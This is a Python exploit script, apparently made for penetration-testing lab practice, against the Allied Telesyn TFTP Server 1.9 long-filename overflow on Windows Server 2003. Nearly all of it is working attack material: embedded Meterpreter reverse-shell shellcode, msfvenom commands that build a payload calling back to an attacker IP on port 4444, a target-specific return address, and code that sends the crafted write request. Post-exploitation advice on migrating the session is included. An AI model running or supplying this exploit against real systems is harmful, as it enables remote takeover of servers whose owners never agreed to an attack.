# Exploit for Allied Telesyn TFTP Server Long Filename Overflow for Windows Server 2003
# Based on Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
# Reference: https://www.exploit-db.com/exploits/16350/
# By TIMLAB/ (timip.net)
# Usage: python atftp_19.py <Local IP> <Target IP> <Target Port>
import sys, socket
# Replace the shellcode below with your own: the bytes shipped here call back to a fixed LHOST/LPORT.
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.134 LPORT=4444 -f raw -o exploit_payload
# echo -en "\x81\xec\xac\x0d\x00\x00" > stack_adjustment
# cat stack_adjustment exploit_payload > adjusted_shellcode
# cat adjusted_shellcode | msfvenom -p - -b "\x00" -a x86 --platform Windows -f python
#
# One-liner:
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.X.X.X LPORT=4444 -f raw -o exploit_payload; echo -en "\x81\xec\xac\x0d\x00\x00" > stack_adjustment; cat stack_adjustment exploit_payload > adjusted_shellcode; cat adjusted_shellcode | msfvenom -p - -b "\x00" -a x86 --platform Windows -f python
# Recommendation: the AT-TFTP process is unstable after exploitation, so migrate the Meterpreter session into another process as soon as it opens, e.g.:
# i.e.: set AUTORUNSCRIPT post/windows/manage/migrate
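# Payload as emitted by the msfvenom pipeline in the header: a
# `sub esp, 0xdac` (81 ec ac 0d 00 00) stack adjustment prepended to the
# reverse_nonx_tcp stager, then encoded with -b "\x00". NUL has to be
# excluded because the whole buffer rides inside the TFTP filename field,
# which the server consumes as a NUL-terminated C string (the terminator is
# appended in TRAILER below). Regenerate it for your own LHOST/LPORT.
SHELLCODE = (
    b"\xbd\x1b\xa2\xb0\x44\xda\xd6\xd9\x74\x24\xf4\x5f\x31"
    b"\xc9\xb1\x2e\x83\xc7\x04\x31\x6f\x11\x03\x6f\x11\xe2"
    b"\xee\x23\x5c\xe8\x1d\x24\x9d\x0d\x77\xcf\xda\x05\x7e"
    b"\xf0\x1a\x2a\xe0\x3e\x3e\x5e\x9d\x7c\x4b\x1d\x60\x05"
    b"\x4a\x31\x11\xa2\x6c\xcc\xcf\xc6\x59\x54\x0e\x37\x90"
    b"\xa8\x89\x6b\x12\xe2\xa4\x72\x57\x77\x76\x01\xa1\x3b"
    b"\x10\xd3\x87\xc9\x3f\x68\x93\x7d\x9b\x6e\x4a\xe7\x68"
    b"\x6c\xd5\x63\x21\x91\xe4\x9a\xbe\x85\x7f\xd5\xac\xf1"
    b"\x63\x87\xd3\x1a\xaa\x9c\x4f\x50\x8e\x12\x04\x26\x1d"
    b"\xd8\x6a\xbb\xb0\x55\xe2\xcb\x94\x0f\xa1\xad\x40\xe3"
    b"\x77\x5a\xe6\x70\x45\xc5\x5c\x11\x10\x8b\x3c\x22\xb4"
    b"\xf9\xee\x8f\x6b\x51\x52\x63\xc8\x06\xdd\x64\xa8\x29"
    b"\x32\x62\x36\x7d\x9e\x15\x8f\x66\xff\x25\x39\x0e\xb9"
    b"\x72\xaa\x30\x6f\x15\x5c\xc5\x9b\x1a\x1a\xbf\xf3\x0b"
    b"\x7e\x26\x57\xa5\x9d\xcc\x47\xe6\x36\x77\xd1\x5f\xbd"
    b"\x88\xf7\x30\x09\x7a\xa8\xe3\x26\xd0\x2e\xbd\x08\xee"
    b"\x51\x5b"
)
buf = SHELLCODE  # name used by the original script

# Return address 0x7c86fed3 (little-endian) for the Windows Server 2003
# build named in the header. It is target specific: a different OS
# build/language needs a different address or the service just crashes.
# It contains no NUL byte, so it survives the C-string copy intact.
RET_ADDR = b"\xd3\xfe\x86\x7c"

# `add esp, 0x28; ret` (83 c4 28 c3) placed right after the overwritten
# return address, then the NUL that terminates the filename, the TFTP
# transfer mode and its terminating NUL.
TRAILER = b"\x83\xc4\x28\xc3" + b"\x00" + b"netascii" + b"\x00"

# TFTP opcode 2 = WRQ (write request), RFC 1350.
WRQ_OPCODE = b"\x00\x02"

# The NOP sled is sized as PAD_BASE - len(lhost). Tying the padding to the
# length of the attacker's IP string presumably means the server builds the
# overflowed buffer from the sender address plus the filename, so lhost must
# be the exact dotted-quad the *target* sees (mind NAT), not a hostname.
PAD_BASE = 25


def _is_dotted_quad(addr):
    """Return True if *addr* is a strict IPv4 dotted-quad like '10.0.0.1'."""
    parts = addr.split(".")
    if len(parts) != 4:
        return False
    for part in parts:
        if not part.isdigit() or int(part) > 255:
            return False
    return True


def build_request(lhost):
    """Build the malicious TFTP WRQ datagram for a sender address *lhost*.

    Layout: opcode | NOP sled (PAD_BASE - len(lhost)) | SHELLCODE | RET_ADDR
    | TRAILER. Returns bytes.

    Raises ValueError if *lhost* is not a dotted-quad IPv4 string: with a
    hostname the sled length (and thus the overwrite offset) would silently
    be wrong, and anything longer than PAD_BASE would make the padding
    negative and vanish.
    """
    if not _is_dotted_quad(lhost):
        raise ValueError("Local IP must be a dotted-quad IPv4 address, got %r" % (lhost,))
    sled = b"\x90" * (PAD_BASE - len(lhost))
    return WRQ_OPCODE + sled + SHELLCODE + RET_ADDR + TRAILER


def main(argv=None):
    """Entry point: send the crafted WRQ from argv[1] to argv[2]:argv[3].

    Returns a process exit code (0 sent, 1 send failure, 2 bad arguments).
    UDP is fire-and-forget, so "Done" only means the datagram left; check
    your handler for the callback.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 4:
        print("Usage: python atftp_19.py <Local IP> <Target IP> <Target Port>")
        return 2
    lhost, host = argv[1], argv[2]
    try:
        port = int(argv[3])
        if not 0 < port <= 65535:
            raise ValueError("Target Port must be 1-65535, got %d" % port)
        exploit = build_request(lhost)
    except ValueError as err:
        print("Error: %s" % err)
        return 2
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        client.sendto(exploit, (host, port))
    except socket.error as err:
        print("Error: send failed: %s" % err)
        return 1
    finally:
        client.close()
    print("Done! Try harder!")
    return 0


if __name__ == "__main__":
    sys.exit(main())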